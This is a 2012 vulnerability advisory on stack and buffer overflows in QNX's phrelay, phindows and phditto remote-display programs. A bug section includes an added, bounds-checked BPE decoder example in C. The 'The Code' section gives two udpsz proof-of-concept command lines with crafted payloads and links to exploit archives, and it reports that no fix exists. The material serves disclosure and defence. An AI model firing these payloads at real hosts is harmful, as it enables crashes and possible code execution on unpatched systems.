The_Arhitect

QNX phrelay/phindows/phditto Multiple Vulnerabilities


QNX phrelay/phindows/phditto Multiple Vulnerabilities

#######################################################################

Luigi Auriemma

Application: QNX phrelay/phindows/phditto
http://www.qnx.com
http://www.qnx.com/developers/docs/6.5.0/topic/com.qnx.doc.phindows/topic/coverpage.html
http://www.qnx.com/developers/docs/6.4.1/neutrino/utilities/p/phrelay.html
Versions: current
Platforms: QNX Neutrino RTOS and Windows
Bugs: A] bpe_decompress stack overflow
B] Photon Session buffer overflow
Exploitation: remote
A] versus client and maybe server
B] versus server
Date: 10 May 2012
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


phrelay and phindows/phditto are based on a private protocol that
allows the Photon graphical environment of the server (exposed through
the phrelay inetd program) to be used from another machine (phindows,
phditto and any other client).


#######################################################################

=======
2) Bugs
=======

--------------------------------
A] bpe_decompress stack overflow
--------------------------------

The BPE (byte pair encoding) compression uses two stack buffers of 256
bytes called "left" and "right".
The bpe_decompress function used in all the client/server programs of
this protocol is affected by a stack-based buffer overflow caused by
the lack of checks on the data sequentially stored in these two
buffers.
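To make the class of bug concrete from the defender's side, here is an added
illustrative BPE decoder (not QNX code, not taken from any of the programs
named above) that carries the bounds checks the advisory says bpe_decompress
lacks. The stream layout is an assumption modelled on Philip Gage's 1994 BPE
scheme: a pair table that fills 256 "left"/"right" slots sequentially,
followed by the encoded bytes. The three sample streams are constructed for
this example, not captured traffic.

```c
/* bpe_checked.c: illustrative Byte Pair Encoding decoder with bounds checks.
 * ASSUMED stream layout (Gage-style, not the QNX wire format):
 *   pair table: run bytes b; b > 127 marks (b - 127) literal slots,
 *               b <= 127 marks (b + 1) pair slots, each a 'left' byte and,
 *               when left != slot index, a 'right' byte; ends at 256 slots.
 *   data      : remaining bytes, expanded through the tables. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BPE_TABLE 256   /* size of the "left" and "right" tables */
#define BPE_STACK 64    /* expansion stack; bounds nested pair chains */

enum { BPE_ERR_TABLE = -1, BPE_ERR_TRUNC = -2, BPE_ERR_OUT = -3, BPE_ERR_DEPTH = -4 };

/* Fill left[]/right[] from the table prefix. Returns bytes consumed or BPE_ERR_*. */
static int bpe_load_table(const uint8_t *in, size_t in_len,
                          uint8_t left[BPE_TABLE], uint8_t right[BPE_TABLE])
{
    size_t pos = 0;
    int slot = 0;                               /* next table index to fill */
    for (int c = 0; c < BPE_TABLE; c++) left[c] = (uint8_t)c;   /* all literal */

    while (slot < BPE_TABLE) {
        if (pos >= in_len) return BPE_ERR_TRUNC;
        int b = in[pos++];
        if (b > 127) {                          /* run of literal slots */
            if (slot + (b - 127) > BPE_TABLE) return BPE_ERR_TABLE;
            slot += b - 127;
            continue;
        }
        int count = b + 1;                      /* run of pair slots */
        /* The check described as missing: the sequential writes into
         * left[]/right[] must stay inside the 256 entries. Testing only
         * for slot == 256 at the loop top would let a run overshoot. */
        if (slot + count > BPE_TABLE) return BPE_ERR_TABLE;
        for (int i = 0; i < count; i++, slot++) {
            if (pos >= in_len) return BPE_ERR_TRUNC;
            left[slot] = in[pos++];
            if (left[slot] != slot) {
                if (pos >= in_len) return BPE_ERR_TRUNC;
                right[slot] = in[pos++];
            }
        }
    }
    return (int)pos;
}

/* Expand encoded bytes. Returns output length or BPE_ERR_*. */
static int bpe_expand(const uint8_t *in, size_t in_len,
                      const uint8_t left[BPE_TABLE], const uint8_t right[BPE_TABLE],
                      uint8_t *out, size_t out_cap)
{
    uint8_t stack[BPE_STACK];
    size_t out_len = 0;
    for (size_t i = 0; i < in_len; i++) {
        int sp = 0;
        stack[sp++] = in[i];
        while (sp > 0) {
            uint8_t c = stack[--sp];
            if (left[c] == c) {                 /* literal byte */
                if (out_len >= out_cap) return BPE_ERR_OUT;
                out[out_len++] = c;
            } else {                            /* pair: expand left first */
                /* A malformed table can reference itself in a loop; the
                 * fixed-size stack turns that into an error, not a crash. */
                if (sp + 2 > BPE_STACK) return BPE_ERR_DEPTH;
                stack[sp++] = right[c];
                stack[sp++] = left[c];
            }
        }
    }
    return (int)out_len;
}

int bpe_decompress_checked(const uint8_t *in, size_t in_len, uint8_t *out, size_t out_cap)
{
    uint8_t left[BPE_TABLE], right[BPE_TABLE];
    int used = bpe_load_table(in, in_len, left, right);
    if (used < 0) return used;
    return bpe_expand(in + used, in_len - (size_t)used, left, right, out, out_cap);
}

/* Constructed samples. GOOD: slot 1 = pair ('a','b'), data 01 01 63 -> "ababc".
 * OVERFLOW: runs reach slot 255 then ask for 128 more pair slots.
 * CYCLE: slot 1 -> (2,2), slot 2 -> (1,1); data 01 never terminates. */
static const uint8_t SAMPLE_GOOD[]     = { 0x80, 0x00, 0x61, 0x62, 0xFE, 0xFE, 0x01, 0x01, 0x63 };
static const uint8_t SAMPLE_OVERFLOW[] = { 0x80, 0xFE, 0xFE, 0x7F, 0x00 };
static const uint8_t SAMPLE_CYCLE[]    = { 0x80, 0x01, 0x02, 0x02, 0x01, 0x01, 0xFE, 0xFD, 0x01 };

/* Helpers that return the decoder's verdict for each sample. */
int bpe_demo_good(void) {
    uint8_t out[32];
    int n = bpe_decompress_checked(SAMPLE_GOOD, sizeof SAMPLE_GOOD, out, sizeof out);
    return (n == 5 && memcmp(out, "ababc", 5) == 0) ? n : -99;
}
int bpe_demo_overflow(void) {
    uint8_t out[32];
    return bpe_decompress_checked(SAMPLE_OVERFLOW, sizeof SAMPLE_OVERFLOW, out, sizeof out);
}
int bpe_demo_cycle(void) {
    uint8_t out[32];
    return bpe_decompress_checked(SAMPLE_CYCLE, sizeof SAMPLE_CYCLE, out, sizeof out);
}

int main(void) {
    printf("good=%d overflow=%d cycle=%d\n", bpe_demo_good(), bpe_demo_overflow(), bpe_demo_cycle());
    return 0;
}
```

The two checks worth noting are the `slot + count > BPE_TABLE` test before each run of table writes (an equality test for "table full" at the loop top is not enough, because one run can carry the index past the end) and the fixed expansion stack, which turns a self-referencing pair table into a clean error instead of unbounded recursion.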


---------------------------------
B] Photon Session buffer overflow
---------------------------------

Buffer overflow affecting phrelay in the handling of the device file
specified by the client as an existing Photon session.


Note: considering that phrelay is not enabled by default and allows
connecting without authentication directly to /dev/photon (the screen
physically visible on the machine), and that phindows/phditto must be
manually pointed at the malicious host to exploit bug A, this
advisory must be considered only a case study and nothing more.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip
http://www.exploit-db.com/sploits/18864.zip


A]
At the moment I don't know how to call bpe_decompress on phrelay, but I
have verified that the bpe_decompress function is vulnerable at 100%.
The following test works only on phindows/phditto (the proof-of-concept
acts as a server):

udpsz -C "a5 00 00 01 0000 ffff" -b A -l 0 -T -1 0 4868 1+7+0xffff

B]
udpsz -C "a5 10 00 00 0000 ffff 1400000008040100000000008002e0010000000000000000000000000000" -b A -T SERVER 4868 1+7+0xffff


#######################################################################

======
4) Fix
======


No fix.


#######################################################################

Source: QNX phrelay/phindows/phditto Multiple Vulnerabilities
